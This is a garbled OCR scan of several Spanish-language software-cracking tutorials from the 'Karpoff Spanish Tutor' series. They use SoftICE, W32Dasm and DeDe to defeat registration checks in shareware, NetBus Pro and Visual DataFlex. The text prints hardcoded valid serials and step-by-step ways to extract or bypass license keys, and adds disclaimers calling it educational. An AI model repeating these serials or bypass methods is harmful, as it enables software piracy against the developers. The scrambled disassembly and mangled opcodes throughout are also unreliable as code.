:00404871 SOfb0e cmp bl, 0e 3 y 40 con 14 (Oe en hexa) 
:00404874 7513 jnz 00404889 

:00404876 sOfaS9 cmp dl, 59 S” y 6 con 89 (59 en hexa) 
:00404879 750e jnz 00404889 

:0040487b S0f958 cmp cl, 58 Ty8 con 88 (58 en hexa) 
:0040487e 7509 jnz 00404889 

:00404880 b801000000 mov eax, 00000001 

:00404885 Sb pop ebx 

:00404886 c21000 ret 0010 


y así sucesivamente unas 112 veces mas 


el gráfico habla por sí solo. el programa toma nuestro falso serial (12345678), lo fracciona en cuatro (12-34-56-78) y lo carga 
en los registros (al-bl-dl-cl). luego realiza la comparación de los registros con números fijos (hardcoded). al principio te decía 
que no repitieras los números dentro del serial, si por ejemplo elegías poner 88888888 no te podrías dar cuenta que parte del 
serial compara. si no conté mal hay 112 rutinas de comparación, es decir 112 seriales distintos que funcionarán. en la 
pantalla del soft-ice de arriba vemos dos de las rutinas de comprobación que corresponden a los números 70376534 y 
80148988 te dejo el resto a vos para que los pruebes. para poder probar más de uno, una vez que está registrado, ejecutá el 
regedit (desde el menú inicio) y buscá en local machine/software/ jaibo/registration, tus datos. borralos y estarás sin registrar 
nuevamente. 


una cosa más las comparaciones son fijas (no son producto de operaciones) que quiere decir esto? oooooocccicnono connooncnnnos 
exacto, que el nombre no es utilizado en lo más mínimo en la rutina de comprobación. cualquier número de serie funcionará 
con cualquier nombre. 


E O O O O O OI 


actualización para la versión 1.5 ....... 


E ó como hacerle la vida más fácil al cracker!!! 5-) 


en principio es igual, solo difieren las direcciones. por si, haciendo una búsqueda en la web no conseguís la versión anterior, 


[te voy a dar las posiciones de memoria del soft-ice para que lo puedas seguir. el siguiente cuadro adapta lo visto para la 
¡versión 1.1 a la actual versión 1.5 


versión 1.1 versión 1.5 


0040436b 0040461b 


004043d4 mov 00404684 mov 
004045cb call 0040487b call 


en esta versión, el programa vuelve a fraccionar el serial, pero más tarde lo vuelve a reconstruir (¿?) como ya veremos. 
vamos a la posición 40487b: 


:0040487b e870020000 call 00404af0 llamada a la rutina de comprobación 
:00404880 85c0 test eax, eax 
:00404882 7539 jnz 004048bd 


hasta aquí todo similar a la versión anterior. el cambio se produce dentro del call 40487b. entonces f8 y entramos. vamos 
pulsando f10 hasta llegar a 


:00404b7d 8d44240c lea eax, dword ptr [esp+0c] aquí reconstruye nuestro serial 


seguimos presionando f10 hasta llegar aquí: 


:00404b8a 3d56dc3104 cmp eax, 0431dc56 compara 12345678 con 70376534 
:00404b8f 7529 jnz 00404bba si no es igual pasa a la siguiente comprobación 
:00404b91 8d4c2408 lea ecx, dword ptr [esp+08] 

:00404b95 c744241cffffffff mov [esp+1c], fEfFEfFf 

:00404b9d  es98ef0400 call 00453b3a 

:00404ba2 b801000000 mov eax, 00000001 

:00404ba7 8b4c2414 mov ecx, dword ptr [esp+14] 

:00404bab  64890d00000000 mov dword ptr fs:[00000000], ecx 

:00404bb2 Sf pop edi 

:00404bb3 Se pop esi 

:00404bb4  83c418 add esp, 00000018 

:00404bb7  c21000 ret 0010 

:00404bba  3dfcf9c604 cmp eax, O4c6f9fc compara 12345678 con 80148988 
:00404bbf 7529 jnz 00404bea si no es igual pasa a la siguiente comprobación 


te suenan estos números, seguro que sí, son los mismos seriales válidos que antes. si en la posición 404b8a haces ?eax 
obtendrás bc614e que no es otra cosa que 12345678 en hexadecimal. asimismo 0431dc56 es 70376534. al igual que antes 
tendras más de 100 seriales válidos. la diferencia esta en que son mucho más fáciles de encontrar ahora que en la versión 
anterior. 


ahora te toca a vos: (la estabas extrañando, no) con la misma técnica que la usada hasta aquí, tenes que encontrar los 
seriales de colorfun v1.0 y de jball v1.0 . ambos programas los podrás bajar de la misma página que tetfun. en el caso de 
jball la protección es similar a la de la versión vieja del tetfun, mientras que en el caso de colorfun es del tipo de la nueva. 


por dudas o consultas comunicate a http://yerbamatearO yahoo.com 


espero que este tutorial te haya sido útil, nos vemos en el próximo 


yerba mate 


' todo es fácil cuando se sabe como' 


importante: lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, no como robar alguna 
propiedad. si vas a usar este programa debes comprarlo. si no fuera por los programadores de shareware no tendríamos con 
que entretenernos. 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


NetBus v2.10 


Herramientas: — [File InsPEctor, Softlce, DeDe. 
CRACKER: DeK_0OiN FECHA: 06/11/2000 


INTRODUCCION 


Aquí con otro manual. Esta vez de un programa que no necesita presentación. Ya todos lo deben conocer 
¡jeje!. Podremos comprobar lo útil que puede sernos el DeDe. Vamos a crackear!. 


AL ATAKE 


Antes que nada, analizamos el NetBus.exe con el File InsPEctor y obtenemos la siguiente información: 


e No está empakado 
e Ni encryptado 
e Hecho en Delphi 3.0 


Si el programa está hecho en Delphi, ya tenemos una gran herramienta creada por DaFixer, llamada DeDe, el mejor decompilador 
de Delphi del momento. Abrimos DeDe y decompilamos el netbus.exe. En la barra de estado hay una opción que dice Procedures, 
pues esta siempre nos será la más importante. Ahora a buscar!!. Voy presionando la R para ver si hay algo tipo Register y si!, 
Register TRegisterForm. Hacemos clic sobre eso y a la derecha aparecerán cosas como CancelButtonClick, HowToBtnClick, 
RegButtonClick y FormShow. La que me parece más interesante es la de RegButtonClick ya que nos mostrará que pasará cuando 
hagamos clic en el botón de Register. Hacemos doble clic sobre RegButtonClick y nos aparecerá el código en ASM exactamente 
igual a como lo veríamos en el W32Dasm. Examinemos el código. Centrémonos en esta parte: 


004E0D01 E9062AF2FF jmp 0040370C 
004E0D06 EBFO Jjmp 004E0CF8 
004E0D08 E86F54FFFF Ccal1 004D617C ¡llama a la rutina de comprobación 


004E0D0D 84C0 test al, al ¿el flag devuelto es cero? 


004E0DOF 7414 jz 004E0D25 


si es así, jz_error 


004E0D11 B940000000 mov ecx, $00000040 ;si no es cero continúa 


;y muestra los mensajes 


* Possible String Reference to: "Thanks" 


004E0D16 BAA40D4E00 


¡de gracias por registrarse! 


mov edx, $004E0DA4 
* Possible String Reference to:"Thanks for registering NetBus Pro and 


supporting Shareware software." 


004E0D1B B8B40D4E00 mov eax, $004E0DB4 
004E0D20 E8736F0000 call 004E7C98 
004E0D25 8B45FC mov eax, [ebp-$04] 
004E0D28 E8ATECF6FF call 0044F9D4 
004E0D2D 33C0 xor eax, eax 


Podríamos cambiar el jz a ¡nz pero recuerden, es mejor encontrar un serial válido cuando se puede en vez de hacer parcheos. ¿Que 
pasaría si el Net Bus tuviera protección CRC (cosa que dudo)?. Podríamos saltarla con un je a un jne o podríamos pasarnos una 
eternidad tratando de ver como quitarlo. Yo opto por no probar. Sabemos donde está la llamada a la rutina de comprobación así 
que las cosas se nos harán más fáciles con el SiCE. 


Vamos al Symbol Loader del SiCE y cargamos el NetBus. Le damos al botón de los engranajes y aparecerá un mensaje de error. 
Le damos a si y entramos al SiCE. Ya saben que hacer, bpx 4E0D08 luego salimos del SiCE y rellenamos los datos de registro. Yo 


pondré los siguientes: 


e Nombre: DeK_OiN 
e Company: K-FoR 
e Key: ABC123 


Pulsamos Register y efectivamente!, esta call llama la rutina de comprobación. Pulsamos F8 para entrar en la call y aparecemos 


aquí: 

:004D617C 55 push ebp ; aquí aparecemos 
:004D617D 8BEC mov ebp, esp 

:004D617F 81C4E8FDFFFF add esp, FFFFFDE8 

:004D6185 33C0 xor eax, eax 

:004D6187 8985E8FEFFFF mov dword ptr [ebp+-FFFFFEE8], eax 

:004D618D 8D45EC lea eax, dword ptr [ebp-14] 

:004D6190 8B153C5F4D00 mov edx, dword ptr [004D5F3C] 

:004D6196 E851E3F2FF call 004044EC 

:004D619B 33C0 xor eax, eax 

:004D619D 55 push ebp 

:004D619E 686C624D00 push 004D626C 

:004D61A3 64FF30 push dword ptr fs:[eax] 

:004D61A6 648920 mov dword ptr fs:[eax], esp 

:004D61A9 8D45EC lea eax, dword ptr [ebp-14] 

:004D61 AC ES97FEFFFF call 004D6048 ¡lee nuestra company 
:004D61B 1 33C9 XoOr ecx, ecx 

:004D61B3 B201 mov dl, 01 

:004D61B5 A150534D00 mov eax, dword ptr [004D5350] 


:004D61BA ESD1F9FFFF 
:004D61BF 8945F8 
:004D61C2 33C0 
:004D61C4 55 

:004D61C5 683E624D00 
:004D61CA 64FF30 
:004D61CD 648920 
:004D61D0 8D85ESFEFFFF 
:004D61D6 8B4DF0 
:004D61D9 BA84624D00 
:004D61DE ESD1DDF2FF 
:004D61E3 8B95E8FEFFFF 
:004D61E9 8D85ECFEFFFF 
:004D61EF B9FF000000 
:004D61F4 ES4BDDF2FF 
:004D61F9 8$D85ECFEFFFF 
:004D61FF 50 

:004D6200 8D85E8FDEFFF 
:004D6206 8B55EC 
:004D6209 B9FF000000 
:004D620E E831DDF2FF 
:004D6213 8D95E8FDFFFF 
:004D6219 8B45F8 
:004D621C 59 

:004D621D E842F8FFFF 
:004D6222 85C0 

:004D6224 0F9445FF 
:004D6228 33C0 


Bien, nos paramos sobre la call que generará nuestro serial y apretamos F8 para entrar. 


:004D5A64 53 
:004D5A6S5 56 
:004D5A66 57 
:004D5A67 83C4C0 
:004D5 AGA 8BFl 
:004D5A6C 8D3C24 
:004D5A6F 33C9 
:004D5A71 SAOE 
:004D5A73 80F909 
:004D5A76 7202 
:004D5A78 B109 
:004DSA7A 880F 
:004D5A7C 46 
:004D5A7D 47 
:004DS5A7E F3 


call 004D5B90 

mov dword ptr [ebp-08], eax 

xor eax, eax 

push ebp 

push 004D623E 

push dword ptr fs:[eax] 

mov dword ptr fs:[eax], esp 

lea eax, dword ptr [ebpp+FFFFFEE8] 
mov ecx, dword ptr [ebp-10] 

mov edx, 004D6284 

call 00403FB4 

mov edx, dword ptr [ebp+-FFFFFEES8] 
lea eax, dword ptr [ebp+FFFFFEEC] 
mov ecx, OOOOOOFF 

call 00403F44 

lea eax, dword ptr [ebpp+FFFFFEEC] 
push eax 

lea eax, dword ptr [ebp+FFFFFDES] 
mov edx, dword ptr [ebp-14] 

mov ecx, OOOOOOFF 

call 00403F44 

lea edx, dword ptr [ebp+FFFFFDES8] 
mov eax, dword ptr [ebp-08] 

pop ecx 

call 004D5A64 

test eax, eax 

sete byte ptr [ebp-01] 


Xor €ax, tax 


push ebx 

push esi 

push edi 

add esp, FFFFFFCO 
mov esi, ecx 

lea edi, dword ptr [esp] 
XOr €eCX, ecx 

mov cl, byte ptr [esi] 
cmp cl, 09 


jb 004DSATA 


mov cl, 09 

mov byte ptr [edi], cl 
inc esi 

inc edi 


repz 


; ecx tiene serial falso 
; sl escribimos d ecx veremos nuestro 
; código falso y con d edx veremos $ 


; (solo si nos paramos en la call) 


; copia $ABC123 


; calcula la longitud del name 


; llama a la rutina de generación del serial 


; (debemos pararnos en esa call) 


Aquí apareceremos: 


; copia la lonitud del serial a cl 
; longitud del serial debería ser 8 + 1 del $ 
; Si es menor nos vamos al error 


; de lo contrario tenemos la longitud en cl 


:004D5A7F A4 
:004D5A80 8BF2 
:004D5A82 8D7C240A 
:004D5A86 33C9 
:004D5A88 SAOE 
:004D5A8SA 80932 
:004D5A8D 7202 
:004D5ASF B132 
:004D5A91 880F 
:004D5A93 46 
:004D5A94 47 
:004D5A9S5 F3 
:004D5A96 A4 
:004D5A97 8BD8 
:004D5A99 33D2 
:004DS5A9B 8A54240A 
:004D5A9F 42 
:004DSAAO 83FA32 
:004D5AA3 7FOE 
:004D5AAS 8D44140A 
:004D5AA9 C6002A 
:004D5AAC 42 
:004DSAAD 40 
:004D5AAE 83FA33 
:004D5AB1 75F6 
:004D5AB3 8BCC 
:004D5AB5 8D54240A 
:004D5AB9 8BC3 


:004D5ABB ESFCFEFFFF 


:004D5ACO 84C0 
:004D5AC2 7458 
:004D5AC4 33F6 


:004D5AC6 8D8338030000 


:004D5ACC 8D54240A 
:004DSADO B132 


movsb 

mov esi, edx 

lea edi, dword ptr [esp+0A] 
XOr €eCX, ecx 

mov cl, byte ptr [esi] 

cmp cl, 32 

jb004D5A91 

mov cl, 32 

mov byte ptr [edi], cl 

inc esi 

inc edi 

repz 

movsb 

mov ebx, eax 

xor edx, edx 

mov dl, byte ptr [esp+0A] 
inc edx 

cmp edx, 00000032 

jg 004D5AB3 

lea eax, dword ptr [esp+edx+0A] 
mov byte ptr [eax], 2A 
inc edx 

inc eax 

cmp edx, 00000033 

jnz O0O4£DSAA9 

mov ecx, esp 

lea edx, dword ptr [esp+0A] 
mov eax, ebx 

call 004D59BC 

test al, al 

32 004D5B1C 


xor esi, esi 


lea eax, dword ptr [ebx+00000338] 


lea edx, dword ptr [esp+0A] 


mov cl, 32 


; edx = 8 = longitud que debería tener el 
; serial la compara con 32 (50 en decimal) 
; SI es mayor nos vamos al error 


; si es menor continuamos 


; llama a la rutina que genera nuestro serial 
; ¿flag devuelto es cero? 


; sies así, felicidades!!! 


Cuando llegamos 004D5AB1 hay un pequeño bucle por lo que escribimos G 004D5AB3 (dirección siguiente al ¡nz 0O4D5AA9. 
Ahora si podemos seguir con F10 hasta llegar a la call que genera el serial (tal vez dentro de esa call hay otras calls que generan el 
serial). Ahora le damos a Fl0 para pararnos sobre el test al, al y ponemos D edx. Bajamos una línea en la ventana de datos y ya 
tenemos nuestro serial válido! (asegúrense de escribirlo sin el $). 


Esto es todo, espero que les haya gustado el tutorial, si es así, háganmelo saber. Recuerden, antes de preguntar pásense por los 
foros de TNT WkT y kUT. NO responderé a los pedidos de cracks y tampoco a los mails que vienen con un ejecutable adjuntado. 
Si no respondo a un mail es por eso así que nada de excusas de "ahh!, pobre de mi que no podré alimentar a mi familia!". Y 
también todos tienen que recordar que este tutorial fue creado SOLO con fines educativos y que yo NO puedo hacerme 
responsable del uso que le puedan dar. Si te gusta el programa COMPRALO!, apoya al shareware, sino el no podríamos aprender 


nada!!!. 


Saludos a: 


Profesor X 

Txeli 

Todos los de [K-FoR] 
Act MagO 

Xasx 

Mr.Jade 

SkUaTeR 

Karpoff 


Nos vemos en el próximo tutorial!, 


Astalavista 


Página oficial del grupo K-FoR:_http://pagina.de/kfor 
Mi dirección de E-Mail: dek ointdhotmail. com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 
Programa: Ir ra ea 


PROTECCION: Serial, Nag screen y límite de tiempo. 
Descripcion: | Excelente herramienta RAD para desarrollo de aplicaciones de base de datos 
Dificultad: supongo que fácil aunque para mi no tanto 


Visual DataFlex 6.2: ftp.dataaccess.com/pub/products/vdf/eval/Setup62.exe (41 Mb) 
DOWNLOAD : Visual DataFlex 7.0: ftp.dataaccess.com/pub/products/vdf/eval/Setup7.exe (42 Mb) 
WebApp Server 2.x: ftp.dataaccess.com/pub/products/webapp/eval/Setup .EXE (22 Mb) 


herramientas: —— |[Softlce 3+, W32Dasm, Hex Editor 


INTRODUCCION 


El mismo programa sirve para registrar el resto de las aplicaciones de la empresa DataAccess: WebApp 
Studio x.x y WebApp Server x.x utilizando además el mismo esquema de registración que el usado para el 
programa que nos ocupa. 


AL ATAKE 


Visual dataflex es, al decir de sus desarrolladores, "una suite de herramientas de software, una metodología de diseño, 
componentes de aplicaciones, un procesador de transacciones dbms con opciones cliente-servidor, construidos 
alrededor de un maduro 4gl orientado a objetos. desarrolladores profesionales a través del mundo lo usan para crear 
aplicaciones de base de datos de alta performance para windows 95/98 y windows nt. con visual dataflex usted puede: 


-producir aplicaciones de base de datos mas rápidamente gracias a su ide specialmente puesta a punto para manipular 
bases de datos. 


-extender la funcionalidad de sus aplicaciones a traves de un probado 4gl orientado a objetos. 
-conectar su aplicaciones con los rdbms lideres del mercado. 

integrar facilmete su aplicaciones a la web mediante la utilización de webapp server. 

-además visual dataflex incluye un poderoso dbms para distribuir sus aplicaciones libre de regalías." 


¿software prometedor no? al inicio tenemos que decidir si vamos a instalar la version de desarrollo para lo cual 


debemos ser dueños de una licencia o, por el contrario, si deseamos probar la aplicación por 60 días. instalando la 
segunda opción tendremos posibilidad de registrarnos mas tarde mediante el programa register.exe que se encuentra en 
la carpeta Wbin de la instalación. 


para conocer las características de nuestra victima corremos el file analyzer el cual nos muestra que el ejecutable no 
esta protegido contra desensamblado, que no esta empaquetado y que está compilado con borland/inprise delphi 4. 
ejecutando el programa nos aparece la siguiente pantalla de registro que nos solicita numero serial, nombre de usuario 
y código de registro. además nos muestra una ventana de existing registrations con los siguientes datos: 


serial num: 1 
registered name: data access corporation 


product: visual dataflex 7.x evaluation 


y dos botones deshabilitados set default name y delete registration. evidentemente este programa nos debería permite 
registrar distintos usuarios (¿productos también?) y mantenerlos a través de los botones antes mencionados. 


[DJRegister Your Data Access Worldwide Product Y -10/ xf 


Enter Registration Details 


You must registerthe product before you can use it. Enter your 
registration details exactly as printed 


Serial Number: [ 
Registration Name: | 
Registration Code: | 


—Existing Registrations- 
| Produet | RegisteredName nat 
«2 Visual DataFlex 7.x Evaluation Data 4ccess Corporation 
SetDefaultWName Delete Registration 


Wersion: 2.0 
Copyright: 1999 Data 4ccess Corporation lose | 


en virtud de los escasos conocimientos que poseo respecto a la ingenieria inversa he decidido atacar la protección por 
el lado de la generación de un número de código que permita registrar el programa en vez de analizar el esquema 
temporal de los 60 días de prueba. al comenzar el análisis del programa a través del listado muerto generado por 
w32dasm rápidamente podemos ver, en la sección imports, que register.exe llama a winsetup.dll. el mismo se 
encuentra en la carpeta Wbin antes mencionada. winsetup.dll posee las siguientes funciones: 


winsetup.commitregistration 
winsetup.deleteregistration 
winsetup.getactiveregistration 
winsetup.getregistrationcount 
winsetup.getregistrationname 
winsetup.getregistrationproduct 
winsetup.getregistrationserialnumber 


winsetup.registerproduct 
winsetup.setactiveregistration 
winsetup.setactiveregistration 


nombres lo suficientemente sugestivos y que se asemejan más a una luz de un faro en medio de la tormenta que a los 
destinados a proteger un software de u$s 1.000 para el caso de visual dataflex o de más de u$s 2.000 para webapp 
server. ¿existirá una relación inversamente proporcional entre el precio del software y la calidad de su esquema de 
protección? 


que otra cosa interesante, bien veamos la string data references y sorpresa, entre otras cosas podemos ver aún luces 
mas intensas: 


string resource id=40009: "that combination of codes is invalid. please re-enter your 1" 
string resource id=40010: "congratulations. your license is now registered." 

string resource id=40021: "unable to register the product as an error occurred trying t" 
string resource id=40024: "unable to register the product as you have exceeded the maxi" 
string resource id=40025: "unable to register the product as it couldn't be set as the " 
string resource id=40026: "a termlist.cfg was found, but it is corrupted. either delete" 


ya podemos extraer algunas conclusiones importantes, a saber: 


a. las rutinas de protección deben encontrarse en winsetup.dll (con semejantes nombres...) 

b. el archivo termlist.cfg, que también se ubica en Wbin, se encuentra vinculado de uno u otro modo en el esquema 
de registro del producto. 

c. tenemos un posible punto de entrada en la cadena id=40010 "congratulations..." la cual no se repite en ningún 
otro punto del desensamblado, a diferencia de la cadena id=40021 y similares. 


bien, manos a la obra. iniciamos el análisis por el lado del punto b). termilst.cfg es un archivo binario que nos muestra 
lo siguiente: 


00000000h: 44 61 74 61 20 41 63 63 65 73 73 20 43 61 72 70 ; data access corp 
00000010h: 6f 72 61 74 69 6f 6e 00 00 00 00 00 00 00 00 00 ; poration 
00000020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00000030h: 00 00 la 00 01 00 00 00 10 18 80 00 01 00 00 00 

00000040h: 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00000050h: 00 00 00 00 00 00 00 00 09 1f 5d a9 00 00 00 00 

00000060h: 00 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 


el archivo es simétrico respecto a la posición 400h mostrando exactamente la misma información. si renombramos el 
archivo nos desaparece la información que muestra la ventana de existing registrations. con esto ya podemos inferir 
que es éste el archivo que guarda la información de registro. 


la parte del codigo de desensamblado donde aparece termlist es la siguiente: 


¿2 URSoft W32Dasm Yer 8.93 Program DisassemblerDebugger 


Disassembler 


Project Debug Search Goto Execute Text Functions HexData Refs Help 


* Referenced by a CALL at Address: 
|:0044B97C 


* Reference To: winsetup.RegisterProduct, Ord: 0000h 


:0044B7?0C FF25B0F64400 
:0044B7?12 SECO 


| 
Jmp dword ptr [0044F6B0] 
mov eax, eax 


* Referenced by a CALL at Addresses: 


|:0044BA20 + D044BE29 , :D044C0A8 

l 

:0044B7?14 55 push ebp 

:0044B715 SBEC mov ebp, esp 

:0044B717 83C4E0 add esp, FFFFFFEO 

:0044B71A 53 push ebx 

:0044B71B 56 push esi 

:0044B7?1C 33D2Z xor edx, edx 

:0044B71E S955E0 mov dword ptr [ebp-20], edx 
:0044B7?21 8945FC mov dword ptr [ebp-04], eax 
:0044B724 33C0 xor eax, eax 

:0044B726 55 push ebp 

:0044B727 6814B94400 push 0044B914 

:0044B72C 64FF30 push dword ptr fs: [eax] 
:0044B72F 648920 mov dword ptr fs: [eax], esp 
:0044B732 8B45FC mov eax, dword ptr [ebp-04] 
:0044B735 8B928F4020000 mov ebx, dword ptr [eax+000002F4] 
:0044B73B SBS8308020000 mov eax, dword ptr [ebx+00000208] 
:0044B741 ES62C9FFFF call 00448048 

:0044B746 48 dec eax 

:0044B747 85C0 test eax, eax 

:0044B749 7C1F j1l 0044B76A 

:0044B74B 40 inc eax 

:0044B74C 8945E4 mov dword ptr [ebp-1C], eax 


* Referenced by a (U)nconditional 


or (Cjonditional Jump at Address: 


|:0044B768(C) 

l 

:0044B74F SB45FC mov eax, dword ptr [ebp-04] 
:0044B752 8B80F4020000 mov eax, dword ptr [eax+000002F4] 
:0044B758 S8BS008020000 mov eax, dword ptr [eax+00000208] 
:0044B75E 33D2 xor edx, edx 

:0044B760 ES4BDIFFFF call 004488B0 

:0044B765 FF4DE4 dec [ebp-1C] 

:0044B768 75ES jne 0044B74F 


* Referenced by a (U)nconditional 
|:0044B7491(C) 

l 

:0044B76A SD45FS 

:0044B7?6D 50 


Al] 


or (Cjonditional Jump at Address: 


lea eax, dword ptr [ebp-08] 
push eax 


Line:171989 Pg 2073 of 2093 File:C:Temp'Register.exe 


una llamada a winsetup.registerproduct y luego otra a getactiveregistration donde aparentemente podría estar leyendo 
el archivo termlist.cfg para determinar el usuario activo y su código de registro en virtud de que luego de esta llamada 
aparecen dos comparaciones que pueden saltarse el texto mencionado en string resource id=40026 tal como se ve a 
continación: 


¿2 URSoft W32Dasm Yer 8.93 Program Disassembler 'Debugger 


Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


* Reference To: winsetup.CetiActiveRegistration, Ord: O0000h 
| 


:0044B773 59 pop ecx 

:0044B774 85C0 test eax, eax 

:0044B776 742B je 0044B7A3 

:0044B778 83F804 cmp eax, 00000004 

:0044B77B 7426 je 0044B7A3 

:0044B77D SDSSEO lea edx, dword ptr [ebp-20] 

* Possible Reference to String Resource ID=40026: "A .Ccfg was 
| 

:0044B7?80 BS5A9C0000 mov eax, O00DO9C5A 

:0044B785 ESEECSFEFF call 00407B78 

:0044B78A S8B45E0 mov eax, dword ptr [ebp-20] 

:0044B7?8D ESlI69DFFFF call 004454483 

:0044B792 A150DD4400 mov eax, dword ptr [0044DD50] 

:0044B797 S8BOO mov eax, dword ptr [eax] 

:0044B799 ESDA7TSFFFF call 00442FAS5 

:0044B7?9E E9S5BO10000 jmp 0044BSFE 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
1:0044B77?6(C), :0044B77B(C) 

| 

:0044B7A3 8D45E8 lea eax, dword ptr [ebp-18] 
:0044EB726 50 push eax 


* Reference To: vinsetup. 6etRegistrationlCount, Ord: 0000 
| 


:0044B7A7 ESZ2OFFFFFF Call 0044B6CC 

:0044B7AC 59 pop ecx 

:0044B7AD S8B45E8 mov eax, dword ptr [ebp-18] 
:0044B7B0 85Cc0 test eax, eax 

:0044B7B2 0OFSE46010000 jle 0044BSFE 

:0044B7B8 8945E4 mov dword ptr [ebp-1C], eax 
:0044B7?BB BEO1000000 mov esi, 00000001 


* Referenced by a (V)inconditional or (Cjonditional Jump at Address: 


|:0044BSF8(C) 

| 

:0044B7C0 8D45F4 lea eax, dword ptr [ebp-0C] 
:0044B7?C3 50 push eax 

:0044B7C4 56 push esi 


* Reference To: winsetup.CetRegistrationName, Ord: 0000 
| 


:0044B7C5 ESl12FFFFFF Call 0044B6DC 

:0044B7?CA 830408 add esp, 00000008 
:0044B7CD 85C0 test eax, eax 

:0044B7CF 7426 je 0044B7F7? 

:0044B7?D1 SDS55EO lea edx, dword ptr [ebp-20] 


Al] 


| Line:172040 Pg 2073 and 2074 of 2093 Code Data (2:0044B76E (DOffset DOD4ABEEh in File:C:ATemp' 


luego hay llamadas a 


winsetup.getregistrationcount 
winsetup.getregistrationname 
winsetup.getregistrationproduct 
winsetup.getregistrationserialnumber 


todas con comprbaciones que nos pueden conducir a nuestro string resource id=40021: "unable to register the product 


as an error occurred trying t" y strings siguientes, de la forma: 
mov eax, "unable to register the product..." 


call 00407b78 


esto es indicativo que las llamadas anteriores tienen como propósito obtener valores de registro para nombre de 
usuario, tipo de producto (debe ser posible registrar otro producto), número serial... 


si seguimos observando un poco más podremos ver una llamada a winsetup.commitregistration con una comprobación 
y salto a nuestra string resource id=40010: "congratulations. your license is now registered." la cual tambien es única 
dentro del desensamblado tal cual se muestra: 


¿2 URSolt W32Dasm Yer 8.93 Program Disassembler 'Debugger 


Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


:0044B9F2 EB31 jmp 0044BA25 


* Referenced by a (U)nconditional or (C)jonditional Jump at Address: 
| 


* Reference To: vinsetup.CommitRegistration, Ord: 0000h 
| 


:0044B9F4 ESOBFDFFFF Call 0044B704 
:0044B9F9 85C0 test eax, eax 
:0044B9FB 740C je 0044BA09 
:0044B9FD ESS4BA4400 mov eax, 0044BA84 
:0044BA02 ESAL9GAFFFF call 004454483 
:0044BA407 EB15 jmp 0044BA1E 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
|:0044B9FB (C) 

l 

:0044BA09 S8D55FO lea edx, dword ptr [ebp-10] 


* Possible Reference to String Resource ID=40010: "Congratulations. Your 
l 


:0044BA40C BS84A9C0000 mov eax, O0009C4A 
:0044BA11 ES62C1FBFF call 00407B78 

:0044BA16 8B45FO mov eax, dword ptr [ebp-10] 
:0044BA19 ESSA9SAFFFF call 00445448 


* Referenced by a (V)inconditional or (Cjonditional Jump at Address: 


|:0044BA07 (0) 

l 

:0044BA1E SBC3 mov eax, ebx 
:0044BA420 ESEFFCFFFF call 0044B7?14 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
1:0044B99E (0), :0044B9BD(0), :0044B9CD(U), :0044B9F2(U) 
l 


:0044BA25 33C0 xor eax, eax 

:0044BA27 5A pop edx 

:0044BA28 59 pop ecx 

:0044BA29 59 pop ecx 

:0044BA2A 648910 mov dword ptr fs: [eax], edx 
:0044BA2D 6847BA4400 push 0044BA47 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 


1:0044BA45(U) 

l 

:0044BA32 8D45FO lea eax, dword ptr [ebp-10] 
:0044BA435 BAD4000000 mov edx, 00000004 
:0044BA43A ESDD7DFEFF call 0040381C 


:0044BA3F C3 ret 


:0044BA35 BA04000000 mov edx, 00000004 
:0044BA3A ESDD?DFEFF call 0040381C 
:0044BA3F C3 ret 


All 


Line:172338 Pg 2077 of 2093 File:C:4TemptRegister. exe 


ahora desensamblamos winsetup.dll para ver si podemos observar algo interesante. en los imports vemos varias 


llamadas a user32.wsprintfa una función usada para el formateo de caracteres y en todos los casos usa en forma 
recurrente: 


possible stringdata ref from data obj ->"%kx-%x+.. ." 
no será que el código de registro es del tipo caracteres-caracteres.... 


vemos también una llamada a messagebeep que podria ser indicativo de una advertencia por mal registro (de acuerdo a 
lo que he leido en varios manuales de ingeniería inversa) y aparece también en un solo lugar del desensamblado (luego 
analizando los mismos programas de la version 6.2 pude conocer que es una llamada a la función dfregistertermlist es 
decir dataflex registrar termlist) mostrando lo siguiente: 


referenced by a call at addresses: e dfregistertermlist 
1:1000232a , :10002343 , :100024c1 


:100013c0 56 push esi 

:100013c1 8b742410 mov esi, dword ptr [esp+10] 
:100013c5 57 push edi 

:100013c6 56 push esi 

:100013c7 56 push esi 

* reference to: user32.chartooema, ord:002bh 


:100013c8 ff15e4700010 call dword ptr [100070€e4] 

:100013ce b900010000 mov ecx, 00000100 

:100013d3 33c0 xor eax, eax 

:100013d5 bfd0900010 mov edi, 100090d0 

:100013da f3 repz 

:100013db ab stosd 

:100013dc 8b442418 mov eax, dword ptr [esp+18] eax = cálculo entre serie y usuario? 
:100013e0 8b4c2410 mov ecx, dword ptr [esp+10] ecx = registration code (ingresado) 
:100013e4 50 push eax 

:100013€e5 56 push esi esi = registration name 

:100013€e6 51 push ecx 

:100013e7 68d0900010 push 100090d0 

:100013ec e8 1fffffff call 10001310 e llamada interesante 

:100013f1 83c410 add esp, 00000010 

:10001314 84c0 test al, al comprueba el valor de retorno 

:10001316 5f pop edi 

:100013f7 5e pop esi 

:10001318 750e ¡ne 10001408 si ne evita la llamada a messagebeep 

:100013fa 6200 push 00000000 


* reference to: user32.messagebeep, ord:01bdh 
| 
:100013fc ff15e8700010 call dword ptr [100070e8] 


:10001402 b801000000 mov eax, 00000001 
:10001407 c3 ret 


* referenced by a (u)nconditional or (c)onditional jump at address: 
[:100013f8(c) 


:10001408 a1d8940010 mov eax, dword ptr [100094d8] 
:1000140d 648b0d2c000000 mov ecx, dword ptr fs:[0000002c] 
:10001414 8b542404 mov edx, dword ptr [esp+04] 

:10001418 6a5c push 0000005c 

:1000141la 8b0481 mov eax, dword ptr [ecx+4*eax] 

:1000141d 68d0900010 push 100090d0 

:10001422 cle20a shl edx, Oa 

